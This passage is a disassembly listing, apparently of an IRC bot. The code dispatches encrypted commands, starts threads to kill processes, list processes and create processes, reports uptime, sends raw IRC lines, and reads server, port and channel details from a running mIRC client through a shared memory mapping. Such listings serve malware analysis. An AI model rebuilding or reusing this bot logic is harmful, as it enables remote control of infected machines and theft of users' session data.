jmp short loc_40C40D
; ---------------------------------------------------------------------------
loc_40C3B9: ; CODE XREF: sub_40A9FE+19A6�j
; sub_40A9FE+19B2�j
push 0Dh
call sub_423800
test eax, eax
pop ecx
jle short loc_40C3D8
push 8
call sub_423800
cmp eax, ebx
pop ecx
jge short loc_40C3D8
push offset aQ3bef_grjcn1aa ; "Q3BEf.grJCN1aA/Td0EX07M1"
jmp short loc_40C40D
; ---------------------------------------------------------------------------
loc_40C3D8: ; CODE XREF: sub_40A9FE+19C5�j
; sub_40A9FE+19D1�j
push 0Dh
call sub_423800
test eax, eax
pop ecx
jg short loc_40C41F
push 8
call sub_423800
test eax, eax
pop ecx
jg short loc_40C41F
push 0Dh
call sub_423800
cmp eax, ebx
pop ecx
jl short loc_40C408
push 8
call sub_423800
cmp eax, ebx
pop ecx
jge short loc_40C43E
loc_40C408: ; CODE XREF: sub_40A9FE+19FC�j
push offset aPJs70eukyp0 ; "P/JS70EukYp0"
loc_40C40D: ; CODE XREF: sub_40A9FE+19B9�j
; sub_40A9FE+19D8�j
lea eax, [ebp+var_6B4A0]
push edi
push eax
call sub_429BBE
add esp, 0Ch
jmp short loc_40C43E
; ---------------------------------------------------------------------------
loc_40C41F: ; CODE XREF: sub_40A9FE+19E4�j
; sub_40A9FE+19F0�j
push offset aQ3bef_grjcn1aa ; "Q3BEf.grJCN1aA/Td0EX07M1"
push offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
push offset aSAndS ; "%s and %s"
lea eax, [ebp+var_6B4A0]
push edi
push eax
call sub_429BBE
add esp, 14h
loc_40C43E: ; CODE XREF: sub_40A9FE+1A08�j
; sub_40A9FE+1A1F�j
lea eax, [ebp+var_D5C]
lea ecx, [ebp+var_D90]
push eax
lea eax, [ebp+var_D28]
push offset aXg4wo0gh6fy0p9 ; "xg4wO0Gh6FY0p9CIj.BYYVY."
push eax
mov eax, offset aNI427pnt0 ; "n/i4//27pnT0"
cmp [ebp+arg_18], 0
push eax
push ecx
push eax
lea eax, [ebp+var_6B4A0]
push offset aOgyzo1Qmpy1 ; "OGyZo1/qmpy1"
push eax
push offset a2ms3c_kjtek0 ; "2MS3c.kJTeK0"
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSSSSSSSSS ; "%s %s %s, %s %s (%s), %s (%s), %s (%s)"
jnz short loc_40C48D
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
jmp short loc_40C497
; ---------------------------------------------------------------------------
loc_40C48D: ; CODE XREF: sub_40A9FE+1A80�j
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
loc_40C497: ; CODE XREF: sub_40A9FE+1A8D�j
add esp, 34h
mov eax, ebx
jmp loc_414998
; ---------------------------------------------------------------------------
loc_40C4A1: ; CODE XREF: sub_40A9FE+18CF�j
push dword ptr [ebx]
push offset aPnb_aBfzu60_0 ; "pNb.a/Bfzu60"
call edi ; dword_437178
test eax, eax
jnz loc_40C570
xor edi, edi
push 1
push edi
call dword_437188 ; GetTickCount
push eax
call sub_41B9F8
push eax
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
lea eax, [ebp+var_57C20]
push offset aSUptimeS_ ; "%s UpTime: (%s)."
push eax
call sub_429B03
add esp, 1Ch
cmp dword_457034, edi
jnz short loc_40C51F
call sub_41BC0B
cmp eax, edi
mov dword_457FD8, eax
jnz short loc_40C518
call sub_41BB89
push eax
push offset aRecordUptimeS_ ; ", Record UpTime: (%s)."
lea eax, [ebp+var_1D78]
push 32h
push eax
call sub_429BBE
add esp, 10h
lea eax, [ebp+var_1D78]
push eax
jmp short loc_40C524
; ---------------------------------------------------------------------------
loc_40C518: ; CODE XREF: sub_40A9FE+1AF3�j
push offset aRecord ; ", (Record)"
jmp short loc_40C524
; ---------------------------------------------------------------------------
loc_40C51F: ; CODE XREF: sub_40A9FE+1AE5�j
push offset dword_43AB8C
loc_40C524: ; CODE XREF: sub_40A9FE+1B18�j
; sub_40A9FE+1B1F�j
lea eax, [ebp+var_57C20]
push eax
call dword_437090 ; lstrcatA
cmp [ebp+arg_14], edi
jnz short loc_40C550
cmp [ebp+arg_18], edi
jnz short loc_40C559
lea eax, [ebp+var_57C20]
push eax
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 0Ch
loc_40C550: ; CODE XREF: sub_40A9FE+1B36�j
cmp [ebp+arg_18], edi
jz loc_414995
loc_40C559: ; CODE XREF: sub_40A9FE+1B3B�j
lea eax, [ebp+var_57C20]
push eax
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CDD4
jmp loc_40D35F
; ---------------------------------------------------------------------------
loc_40C570: ; CODE XREF: sub_40A9FE+1AAE�j
push dword ptr [ebx]
push offset aI7atf_8Tag1 ; "i7Atf.8/tag1"
call edi ; dword_437178
test eax, eax
jnz loc_40C60F
cmp dword_457034, eax
jnz short loc_40C5CC
cmp [ebp+arg_14], eax
mov edi, offset aSSS_0 ; "%s %s (%s)"
mov ebx, offset aUDneTzo8s_omqd ; "u/DnE/tzo8s.OMQDW1DERIa/"
jnz short loc_40C5B9
cmp [ebp+arg_18], eax
jnz short loc_40C5C2
push offset dword_676418
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
xor eax, eax
loc_40C5B9: ; CODE XREF: sub_40A9FE+1B98�j
cmp [ebp+arg_18], eax
jz loc_414995
loc_40C5C2: ; CODE XREF: sub_40A9FE+1B9D�j
push offset dword_676418
jmp loc_40B398
; ---------------------------------------------------------------------------
loc_40C5CC: ; CODE XREF: sub_40A9FE+1B89�j
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aNeuf6qyoiMdAn1 ; "NEuF//6QYOi/Md/AN15kOfy.nR01m1pzFKu1"
jnz short loc_40C5F7
cmp [ebp+arg_18], eax
jnz short loc_40C600
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
xor eax, eax
loc_40C5F7: ; CODE XREF: sub_40A9FE+1BDB�j
cmp [ebp+arg_18], eax
jz loc_414995
loc_40C600: ; CODE XREF: sub_40A9FE+1BE0�j
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push dword ptr [esi+0Ch]
jmp loc_414793
; ---------------------------------------------------------------------------
loc_40C60F: ; CODE XREF: sub_40A9FE+1B7D�j
push dword ptr [ebx]
push offset aVp1weJvqbn_ ; "VP1WE/JVQbn."
call edi ; dword_437178
test eax, eax
jnz loc_40C6EE
push 4
call sub_42381F
xor edi, edi
pop ecx
cmp eax, edi
mov [ebp+arg_C], eax
jle short loc_40C63B
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jmp loc_40B964
; ---------------------------------------------------------------------------
loc_40C63B: ; CODE XREF: sub_40A9FE+1C31�j
mov eax, [ebp+arg_10]
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aS2maintenance_ ; "%s /2Maintenance./2"
push 4
mov [ebp+var_2638], eax
call sub_4234A7
add esp, 0Ch
mov [ebp+var_25B4], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_2638]
push edi
push eax
push offset sub_41EBE9
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_25B4]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_414995
cmp [ebp+arg_14], 0
mov ebx, offset aSS_ ; "%s %s."
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
jnz short loc_40C6BC
cmp [ebp+arg_18], 0
jnz short loc_40C6C2
push edi
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40C6BC: ; CODE XREF: sub_40A9FE+1CA1�j
cmp [ebp+arg_18], 0
jz short loc_40C6E0
loc_40C6C2: ; CODE XREF: sub_40A9FE+1CA7�j
push edi
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 14h
jmp short loc_40C6E0
; ---------------------------------------------------------------------------
loc_40C6D8: ; CODE XREF: sub_40A9FE+1CE9�j
push 32h
call dword_437190 ; Sleep
loc_40C6E0: ; CODE XREF: sub_40A9FE+1CC2�j
; sub_40A9FE+1CD8�j
cmp [ebp+var_257C], 0
jz short loc_40C6D8
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40C6EE: ; CODE XREF: sub_40A9FE+1C1C�j
push dword ptr [ebx]
push offset aUaxwg1w8vsp0qr ; "UaxWg1w8vSP0QRn4z10ge1I1"
call edi ; dword_437178
test eax, eax
jnz short loc_40C707
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push 4
jmp loc_412CA1
; ---------------------------------------------------------------------------
loc_40C707: ; CODE XREF: sub_40A9FE+1CFB�j
push dword ptr [ebx]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call edi ; dword_437178
test eax, eax
jz loc_4147A3
push dword ptr [ebx]
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
call edi ; dword_437178
test eax, eax
jz loc_4147A3
push dword ptr [ebx]
push offset a47ff020f_0_ ; "47Ff/020f.0."
call edi ; dword_437178
test eax, eax
jnz loc_40C840
mov eax, [ebp+arg_10]
push offset dword_443F1C
mov [ebp+var_CE4], eax
mov eax, [ebp+arg_14]
mov [ebp+var_C58], eax
mov eax, [ebp+arg_18]
mov [ebp+var_C54], eax
mov eax, [ebp+arg_20]
mov [ebp+var_C50], eax
lea eax, [ebp+var_CE0]
push eax
call dword_4370B4 ; lstrcpyA
mov ebx, offset aAl_N0kenp20 ; "Al./N0Kenp20"
push ebx
push offset aSBkillThread_ ; "%s BKill thread."
push 1
call sub_4234A7
add esp, 0Ch
cmp [ebp+arg_14], 0
mov [ebp+var_C60], eax
mov edi, offset aSBkillS ; "%s BKill %s"
jnz short loc_40C7B1
cmp [ebp+arg_18], 0
jnz short loc_40C7B7
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40C7B1: ; CODE XREF: sub_40A9FE+1D96�j
cmp [ebp+arg_18], 0
jz short loc_40C7CB
loc_40C7B7: ; CODE XREF: sub_40A9FE+1D9C�j
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push ebx
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 14h
loc_40C7CB: ; CODE XREF: sub_40A9FE+1DB7�j
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_CE4]
push edi
push eax
push offset sub_41F0F5
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_C60]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jnz short loc_40C833
loc_40C7FC: ; CODE XREF: sub_40A9FE+1FF7�j
; sub_40A9FE+212F�j ...
cmp [ebp+arg_14], 0
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz loc_40C21A
cmp [ebp+arg_18], 0
jnz loc_41490F
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push ebx
push edi
push dword ptr [esi+0Ch]
jmp loc_40C20F
; ---------------------------------------------------------------------------
loc_40C82B: ; CODE XREF: sub_40A9FE+1E3B�j
push 32h
call dword_437190 ; Sleep
loc_40C833: ; CODE XREF: sub_40A9FE+1DFC�j
cmp [ebp+var_C4C], edi
jz short loc_40C82B
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40C840: ; CODE XREF: sub_40A9FE+1D36�j
push dword ptr [ebx]
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
call edi ; dword_437178
test eax, eax
jnz loc_40CB55
xor ecx, ecx
cmp [ebx+4], ecx
jnz short loc_40C897
cmp [ebp+arg_14], ecx
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40C881
cmp [ebp+arg_18], ecx
loc_40C86A: ; CODE XREF: sub_40A9FE+1F53�j
; sub_40A9FE+1F93�j
jnz short loc_40C88B
push ebx
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40C881: ; CODE XREF: sub_40A9FE+1E67�j
; sub_40A9FE+1F4A�j ...
cmp [ebp+arg_18], 0
loc_40C885: ; CODE XREF: sub_40A9FE+2068�j
jz loc_414995
loc_40C88B: ; CODE XREF: sub_40A9FE:loc_40C86A�j
; sub_40A9FE+2048�j
push ebx
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
loc_40C891: ; CODE XREF: sub_40A9FE+483F�j
; sub_40A9FE+496D�j ...
push edi
jmp loc_414791
; ---------------------------------------------------------------------------
loc_40C897: ; CODE XREF: sub_40A9FE+1E58�j
mov eax, [ebp+arg_14]
mov edx, [ebp+arg_20]
mov [ebp+var_428], eax
mov eax, [ebp+arg_18]
mov [ebp+var_424], eax
cmp eax, ecx
mov [ebp+var_42C], edx
lea eax, [ebp+var_4D8]
jnz short loc_40C8C1
push dword ptr [esi+0Ch]
jmp short loc_40C8C3
; ---------------------------------------------------------------------------
loc_40C8C1: ; CODE XREF: sub_40A9FE+1EBC�j
push dword ptr [esi]
loc_40C8C3: ; CODE XREF: sub_40A9FE+1EC1�j
push eax
call dword_4370B4 ; lstrcpyA
xor eax, eax
mov [ebp+var_448], eax
mov [ebp+var_444], eax
mov [ebp+var_440], eax
mov eax, [ebp+arg_10]
mov [ebp+var_4DC], eax
push dword ptr [ebx+4]
push offset aPlsymAee6v1_0 ; "PlsYM/aEe6v1"
call edi ; dword_437178
test eax, eax
jnz short loc_40C926
push 2
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40C90E
mov ebx, offset aAl_N0kenp20 ; "Al./N0Kenp20"
jmp loc_40B964
; ---------------------------------------------------------------------------
loc_40C90E: ; CODE XREF: sub_40A9FE+1F04�j
mov [ebp+var_448], 1
mov ebx, [ebx+8]
mov [ebp+var_450], ebx
jmp loc_40C9AB
; ---------------------------------------------------------------------------
loc_40C926: ; CODE XREF: sub_40A9FE+1EF5�j
push dword ptr [ebx+4]
push offset aCwxyh0ryouv1 ; "CwXYh0RYoUv1"
call edi ; dword_437178
test eax, eax
jnz short loc_40C962
mov ebx, [ebx+8]
cmp ebx, eax
jnz short loc_40C956
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40C881
cmp [ebp+arg_18], eax
jmp loc_40C86A
; ---------------------------------------------------------------------------
loc_40C956: ; CODE XREF: sub_40A9FE+1F3B�j
mov [ebp+var_444], 1
jmp short loc_40C99F
; ---------------------------------------------------------------------------
loc_40C962: ; CODE XREF: sub_40A9FE+1F34�j
push dword ptr [ebx+4]
push offset aEavyh_ic0dc0 ; "eAvYh.IC0dc0"
call edi ; dword_437178
test eax, eax
jnz loc_40CA1D
mov ebx, [ebx+8]
test ebx, ebx
jnz short loc_40C996
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40C881
cmp [ebp+arg_18], eax
jmp loc_40C86A
; ---------------------------------------------------------------------------
loc_40C996: ; CODE XREF: sub_40A9FE+1F7B�j
xor eax, eax
inc eax
mov [ebp+var_444], eax
loc_40C99F: ; CODE XREF: sub_40A9FE+1F62�j
mov [ebp+var_454], ebx
mov [ebp+var_440], eax
loc_40C9AB: ; CODE XREF: sub_40A9FE+1F23�j
mov ebx, offset aAl_N0kenp20 ; "Al./N0Kenp20"
push ebx
push offset aSProcs ; "%s Procs"
push 2
call sub_4234A7
add esp, 0Ch
mov [ebp+var_458], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_4DC]
push edi
push eax
push offset sub_41F876
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_458]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_40C7FC
cmp [ebp+var_420], edi
jnz loc_414995
loc_40CA07: ; CODE XREF: sub_40A9FE+2018�j
push 32h
call dword_437190 ; Sleep
cmp [ebp+var_420], 0
jz short loc_40CA07
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40CA1D: ; CODE XREF: sub_40A9FE+1F70�j
push dword ptr [ebx+4]
push offset aUz3rf_vtkug1 ; "uz3rf.VTKug1"
call edi ; dword_437178
test eax, eax
jnz loc_414995
cmp [ebx+8], eax
jnz short loc_40CA6B
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40CA63
cmp [ebp+arg_18], eax
jnz loc_40C88B
push ebx
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
xor eax, eax
loc_40CA63: ; CODE XREF: sub_40A9FE+2043�j
cmp [ebp+arg_18], eax
jmp loc_40C885
; ---------------------------------------------------------------------------
loc_40CA6B: ; CODE XREF: sub_40A9FE+2034�j
xor ecx, ecx
inc ecx
cmp [ebx+0Ch], eax
jz short loc_40CA79
mov [ebp+var_448], ecx
loc_40CA79: ; CODE XREF: sub_40A9FE+2073�j
cmp [ebp+arg_3C], eax
jz short loc_40CA84
mov [ebp+var_444], ecx
loc_40CA84: ; CODE XREF: sub_40A9FE+207E�j
push dword ptr [ebx+8]
lea eax, [ebp+var_63D4]
push eax
call sub_429B03
xor edi, edi
pop ecx
cmp [ebp+arg_34], edi
pop ecx
jz short loc_40CAD7
cmp [ebp+arg_38], 0
mov bl, 5Fh
jz short loc_40CAA7
mov bl, [ebp+arg_38]
loc_40CAA7: ; CODE XREF: sub_40A9FE+20A4�j
push [ebp+var_454]
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_40CAD7
loc_40CAB7: ; CODE XREF: sub_40A9FE+20D7�j
mov eax, [ebp+var_454]
add eax, edi
cmp [eax], bl
jnz short loc_40CAC6
mov byte ptr [eax], 20h
loc_40CAC6: ; CODE XREF: sub_40A9FE+20C3�j
push [ebp+var_454]
inc edi
call sub_4293A0
cmp edi, eax
pop ecx
jb short loc_40CAB7
loc_40CAD7: ; CODE XREF: sub_40A9FE+209C�j
; sub_40A9FE+20B7�j
mov ebx, offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_63D4]
push ebx
push offset aSCreateProcess ; "%s Create process thread."
push 2
mov [ebp+var_454], eax
call sub_4234A7
add esp, 0Ch
mov [ebp+var_458], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_4DC]
push edi
push eax
push offset sub_41F533
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_458]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_40C7FC
cmp [ebp+var_420], edi
jnz loc_414995
loc_40CB3F: ; CODE XREF: sub_40A9FE+2150�j
push 32h
call dword_437190 ; Sleep
cmp [ebp+var_420], 0
jz short loc_40CB3F
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40CB55: ; CODE XREF: sub_40A9FE+1E4D�j
push dword ptr [ebx]
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
call edi ; dword_437178
test eax, eax
jnz loc_40CD08
push 0Ch
call sub_42381F
test eax, eax
pop ecx
mov ebx, offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
jle short loc_40CB93
push ebx
push 0Ch
push 0
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
call sub_423654
add esp, 20h
loc_40CB93: ; CODE XREF: sub_40A9FE+2177�j
cmp dword_457F68, 0
jnz short loc_40CBB4
call sub_429B9C
cdq
mov ecx, 0BBFFh
idiv ecx
add edx, 66h
mov dword_45643C, edx
jmp short loc_40CBC0
; ---------------------------------------------------------------------------
loc_40CBB4: ; CODE XREF: sub_40A9FE+219C�j
movzx eax, word_44399A
mov dword_45643C, eax
loc_40CBC0: ; CODE XREF: sub_40A9FE+21B4�j
and dword_456438, 0
mov edi, offset dword_45622C
push 104h
push edi
push 0
call dword_43717C ; GetModuleFileNameA
push 103h
push offset dword_4439A8
push offset dword_456330
call sub_429D10
and dword_4564CC, 0
push 7Fh
push offset dword_443F14
push offset dword_456440
call sub_429D10
mov eax, [ebp+arg_14]
push edi
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
mov dword_454A48, eax
mov eax, [ebp+arg_18]
push dword_45643C
mov dword_454A50, eax
mov eax, [ebp+arg_20]
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
mov dword_454A4C, eax
mov eax, [ebp+arg_10]
push ebx
push offset aSSOnSISS_ ; "%s %s on %s: %i, %s: %s."
push 0Ch
mov dword_4564D0, eax
call sub_4234A7
add esp, 38h
mov dword_456434, eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push offset dword_456228
push offset sub_402CE9
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, dword_456434
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_40C7FC
jmp short loc_40CC8E
; ---------------------------------------------------------------------------
loc_40CC86: ; CODE XREF: sub_40A9FE+2297�j
push 32h
call dword_437190 ; Sleep
loc_40CC8E: ; CODE XREF: sub_40A9FE+2286�j
cmp dword_4564CC, 0
jz short loc_40CC86
xor eax, eax
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
cmp [ebp+arg_14], eax
jnz short loc_40CCD7
cmp [ebp+arg_18], eax
jnz short loc_40CCE1
cmp [ebp+arg_1C], eax
jnz loc_414995
push dword_456434
push dword_45643C
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push edi
push ebx
push offset aSSOnSIThreadNu ; "%s %s on %s: %i, thread number: %i."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 20h
loc_40CCD7: ; CODE XREF: sub_40A9FE+22A3�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40CCE1: ; CODE XREF: sub_40A9FE+22A8�j
push dword_456434
push dword_45643C
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push edi
push ebx
push offset aSSOnSIThreadNu ; "%s %s on %s: %i, thread number: %i."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
jmp loc_412CB7
; ---------------------------------------------------------------------------
loc_40CD08: ; CODE XREF: sub_40A9FE+2162�j
push dword ptr [ebx]
push offset aAjttz06ztse1 ; "ajTtz06Ztse1"
call edi ; dword_437178
test eax, eax
jnz short loc_40CD2B
mov ecx, [ebp+arg_10]
call sub_41DB58
mov ecx, [ebp+arg_10]
push eax
call sub_41CF25
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40CD2B: ; CODE XREF: sub_40A9FE+2315�j
push dword ptr [ebx]
push offset aUn3hk0sn58o ; "uN3hk0sn58o/"
call edi ; dword_437178
test eax, eax
jnz short loc_40CD5A
mov eax, [ebx+4]
test eax, eax
jz short loc_40CD94
mov ebx, [ebx+8]
test ebx, ebx
jnz short loc_40CD4B
mov ebx, offset byte_454A54
loc_40CD4B: ; CODE XREF: sub_40A9FE+2346�j
mov ecx, [ebp+arg_10]
push ebx
push eax
call sub_41D09B
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40CD5A: ; CODE XREF: sub_40A9FE+2338�j
push dword ptr [ebx]
push offset aQrn4z10ge1i1 ; "QRn4z10ge1I1"
call edi ; dword_437178
test eax, eax
jnz short loc_40CD7C
mov ebx, [ebx+4]
test ebx, ebx
jz short loc_40CD94
mov ecx, [ebp+arg_10]
push ebx
call sub_41D0C6
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40CD7C: ; CODE XREF: sub_40A9FE+2367�j
push dword ptr [ebx]
push offset aBvuso0ed3mw ; "bVUSO0ed3MW/"
call edi ; dword_437178
test eax, eax
jnz loc_40CE48
mov eax, [ebx+4]
test eax, eax
jnz short loc_40CD9E
loc_40CD94: ; CODE XREF: sub_40A9FE+233F�j
; sub_40A9FE+236E�j
mov edi, offset a6h4nn1igjm60 ; "6h4NN1IGJm60"
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_40CD9E: ; CODE XREF: sub_40A9FE+2394�j
push eax
lea eax, [ebp+var_443A0]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 2
pop edi
cmp [ebp+arg_4], edi
jle short loc_40CDF5
loc_40CDBB: ; CODE XREF: sub_40A9FE+23F5�j
mov eax, [ebx+edi*4]
test eax, eax
jz short loc_40CDEF
push eax
lea eax, [ebp+var_15D70]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_15D70]
push 2710h
push eax
lea eax, [ebp+var_443A0]
push eax
call sub_4299E0
add esp, 18h
loc_40CDEF: ; CODE XREF: sub_40A9FE+23C2�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_40CDBB
loc_40CDF5: ; CODE XREF: sub_40A9FE+23BB�j
lea eax, [ebp+var_443A0]
push eax
push [ebp+arg_10]
call sub_41D0ED
cmp [ebp+arg_14], 0
pop ecx
pop ecx
mov edi, offset a6h4nn1igjm60 ; "6h4NN1IGJm60"
mov ebx, offset aSSentIrcRawS_ ; "%s Sent IRC raw: \"%s\"."
jnz short loc_40CE33
cmp [ebp+arg_18], 0
jnz short loc_40CE3D
lea eax, [ebp+var_443A0]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40CE33: ; CODE XREF: sub_40A9FE+2416�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40CE3D: ; CODE XREF: sub_40A9FE+241C�j
lea eax, [ebp+var_443A0]
jmp loc_40B0F9
; ---------------------------------------------------------------------------
loc_40CE48: ; CODE XREF: sub_40A9FE+2389�j
push dword ptr [ebx]
push offset aM1d_716jg1r1 ; "M1d.716Jg1r1"
call edi ; dword_437178
test eax, eax
jnz loc_40D212
mov eax, [ebx+4]
test eax, eax
jnz loc_40D178
mov edi, offset aMirc ; "mIRC"
push eax
push edi
call dword_456F44 ; FindWindowA
test eax, eax
mov [ebp+arg_4], eax
jz loc_40D13B
push edi
xor edi, edi
push 1000h
push edi
push 4
push edi
push 0FFFFFFFFh
call dword_4370C8 ; CreateFileMappingA
push edi
push edi
push edi
push 0F001Fh
push eax
mov [ebp+arg_68], eax
call dword_437040 ; MapViewOfFile
mov [ebp+arg_C], eax
push 10h
lea eax, [ebp+var_314]
push edi
push eax
call sub_429760
push offset aVersion ; "$version"
push [ebp+arg_C]
call sub_429B03
add esp, 14h
mov ebx, 4C9h
push edi
push 1
push ebx
push [ebp+arg_4]
call dword_456F9C ; SendMessageA
push [ebp+arg_C]
mov edi, offset aS_5 ; "%s"
lea eax, [ebp+var_314]
push edi
push 10h
push eax
call sub_429BBE
push 10h
lea eax, [ebp+var_2E4]
push 0
push eax
call sub_429760
push offset off_4416C0
push [ebp+arg_C]
call sub_429B03
add esp, 24h
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F9C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_2E4]
push edi
push 10h
push eax
call sub_429BBE
push 9Fh
lea eax, [ebp+var_2C20]
push 0
push eax
call sub_429760
push offset aServer_0 ; "$server"
push [ebp+arg_C]
call sub_429B03
add esp, 24h
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F9C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_2C20]
push edi
push 9Fh
push eax
call sub_429BBE
push 10h
push 0
lea eax, [ebp+var_304]
push eax
call sub_429760
push offset aServerip ; "$serverip"
push [ebp+arg_C]
call sub_429B03
add esp, 24h
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F9C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_304]
push edi
push 10h
push eax
call sub_429BBE
push 8
lea eax, [ebp+var_58]
push 0
push eax
call sub_429760
push offset aPort_0 ; "$port"
push [ebp+arg_C]
call sub_429B03
add esp, 24h
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F9C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_58]
push edi
push 8
push eax
call sub_429BBE
push 2710h
lea eax, [ebp+var_18480]
push 0
push eax
call sub_429760
push offset aChan0 ; "$chan(0)"
push [ebp+arg_C]
call sub_429B03
add esp, 24h
xor edi, edi
inc edi
push 0
push edi
push ebx
push [ebp+arg_4]
call dword_456F9C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_174]
push 10h
push eax
call sub_429BBE
lea eax, [ebp+var_174]
push eax
call sub_42A100
add esp, 10h
cmp eax, edi
jl loc_40D0D6
loc_40D048: ; CODE XREF: sub_40A9FE+26D2�j
push edi
push offset aChanI ; "$chan(%i)"
push [ebp+arg_C]
call sub_429B03
add esp, 0Ch
push 0
push 1
push ebx
push [ebp+arg_4]
